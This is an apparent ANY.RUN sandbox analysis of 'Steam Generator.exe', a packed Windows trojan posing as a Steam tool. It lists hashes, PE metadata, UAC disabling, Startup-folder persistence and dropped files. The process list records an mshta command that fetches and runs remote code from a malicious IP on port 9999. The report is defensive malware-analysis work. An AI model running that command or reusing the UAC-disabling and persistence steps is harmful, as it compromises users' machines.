analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Steam Generator.exe

Full analysis: https://app.any.run/tasks/09a84f32-2006-4c94-ba01-084084a0c861
Verdict: Malicious activity
Analysis date: November 15, 2018, 09:20:42
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
MD5:

901A0ADFA0BFEE87022FDCD02A3325DA

SHA1:

0A4C47C1A2BFBBD1C2CDCCDB31A0F2FB4BED5C5D

SHA256:

19FB3098B0B8399F945766511BDC370C0ECF5D20BE35C386B42C7688893A3F77

SSDEEP:

12288:8YV6MorX7qzuC3QHO9FQVHPF51jgcRQb1QVOn0o7Qtnxo9brZ1xyW+exy6PzSuL:bBXu9HGaVHRbO0o6xo9hGW+ewAzv

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • UAC/LUA settings modification

      • Steam Generator.exe (PID: 3892)
    • Runs app for hidden code execution

      • Steam Generator.exe (PID: 3892)
    • Writes to a start menu file

      • Steam Generator.exe (PID: 3892)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • Steam Generator.exe (PID: 3892)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 624)
    • Executable content was dropped or overwritten

      • Steam Generator.exe (PID: 3892)
    • Connects to unusual port

      • mshta.exe (PID: 3952)
    • Creates files in the user directory

      • Steam Generator.exe (PID: 3892)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 3952)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | UPX compressed Win32 Executable (39.3)
.exe | Win32 EXE Yoda's Crypter (38.6)
.dll | Win32 Dynamic Link Library (generic) (9.5)
.exe | Win32 Executable (generic) (6.5)
.exe | Generic Win/DOS Executable (2.9)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2018:11:11 15:06:20+01:00
PEType: PE32
LinkerVersion: 12
CodeSize: 356352
InitializedDataSize: 446464
UninitializedDataSize: 974848
EntryPoint: 0x145090
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
FileVersionNumber: 0.0.0.0
ProductVersionNumber: 0.0.0.0
FileFlagsMask: 0x0000
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (British)
CharacterSet: Unicode
Comments: SgWRMkEdkEwuGKdRMDzsoaWEkKiWj
CompanyName: cZZZaoEirexc
FileVersion: wtkZfeB
LegalTrademarks: gyAfMNYHneHGbWsuxFIjaeTAvGbwYNEfVGqEgibsrRhaDcWbpRcRpPjd
OriginalFileName: oAEgwWHPGXAssYiRCbjegjY
ProductName: OLZRHpImjGxL
ProductVersion: eSbYlCkEpVYrKgjRc

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 11-Nov-2018 14:06:20
Detected languages:
  • English - United Kingdom
Comments: SgWRMkEdkEwuGKdRMDzsoaWEkKiWj
CompanyName: cZZZaoEirexc
FileVersion: wtkZfeB
LegalTrademarks: gyAfMNYHneHGbWsuxFIjaeTAvGbwYNEfVGqEgibsrRhaDcWbpRcRpPjd
OriginalFilename: oAEgwWHPGXAssYiRCbjegjY
ProductName: OLZRHpImjGxL
ProductVersion: eSbYlCkEpVYrKgjRc

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000110

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 3
Time date stamp: 11-Nov-2018 14:06:20
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LARGE_ADDRESS_AWARE

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
UPX0
0x00001000
0x000EE000
0x00000000
IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
0
UPX1
0x000EF000
0x00057000
0x00056400
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
7.93563
.rsrc
0x00146000
0x0006D000
0x0006C600
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
7.94963

Resources

Title
Entropy
Size
Codepage
Language
Type
1
5.33317
892
Latin 1 / Western European
English - United Kingdom
RT_MANIFEST
2
3.65355
744
Latin 1 / Western European
English - United Kingdom
RT_ICON
3
3.43704
296
Latin 1 / Western European
English - United Kingdom
RT_ICON
4
4.16139
3752
Latin 1 / Western European
English - United Kingdom
RT_ICON
5
4.07494
2216
Latin 1 / Western European
English - United Kingdom
RT_ICON
6
2.18302
1384
Latin 1 / Western European
English - United Kingdom
RT_ICON
7
0
1428
Latin 1 / Western European
English - United Kingdom
RT_STRING
8
0
1674
Latin 1 / Western European
English - United Kingdom
RT_STRING
9
0
1168
Latin 1 / Western European
English - United Kingdom
RT_STRING
10
0
1532
Latin 1 / Western European
English - United Kingdom
RT_STRING

Imports

ADVAPI32.dll
COMCTL32.dll
COMDLG32.dll
GDI32.dll
IPHLPAPI.DLL
KERNEL32.DLL
MPR.dll
OLEAUT32.dll
PSAPI.DLL
SHELL32.dll
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
4
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start steam generator.exe no specs steam generator.exe cmd.exe no specs mshta.exe

Process information

PID
CMD
Path
Indicators
Parent process
3144"C:\Users\admin\AppData\Local\Temp\Steam Generator.exe" C:\Users\admin\AppData\Local\Temp\Steam Generator.exeexplorer.exe
User:
admin
Company:
cZZZaoEirexc
Integrity Level:
MEDIUM
Exit code:
3221226540
Version:
wtkZfeB
3892"C:\Users\admin\AppData\Local\Temp\Steam Generator.exe" C:\Users\admin\AppData\Local\Temp\Steam Generator.exe
explorer.exe
User:
admin
Company:
cZZZaoEirexc
Integrity Level:
HIGH
Exit code:
0
Version:
wtkZfeB
624cmd.exeC:\Windows\system32\cmd.exeSteam Generator.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3952mshta http://185.82.202.214:9999/uG1HoC:\Windows\system32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Total events
403
Read events
396
Write events
7
Delete events
0

Modification events

(PID) Process:(3892) Steam Generator.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:EnableLUA
Value:
0
(PID) Process:(3952) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(3952) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(3952) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:ProxyEnable
Value:
0
(PID) Process:(3952) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:writeName:SavedLegacySettings
Value:
4600000069000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
Executable files
1
Suspicious files
0
Text files
0
Unknown types
1

Dropped files

PID
Process
Filename
Type
3892Steam Generator.exeC:\Users\admin\AppData\Local\Temp\kozak.exeexecutable
MD5:901A0ADFA0BFEE87022FDCD02A3325DA
SHA256:19FB3098B0B8399F945766511BDC370C0ECF5D20BE35C386B42C7688893A3F77
3892Steam Generator.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kozak.lnklnk
MD5:298E55E2728F566A5EA94EA4A43E5ACB
SHA256:65AEBC85ACDCBE3AD8F66B0B98CB4459A8F641115AB67E3AEFBC76D7A49BC881
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3952
mshta.exe
185.82.202.214:9999
Host Sailor Ltd.
NL
malicious

DNS requests

Domain
IP
Reputation
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

No threats detected
No debug info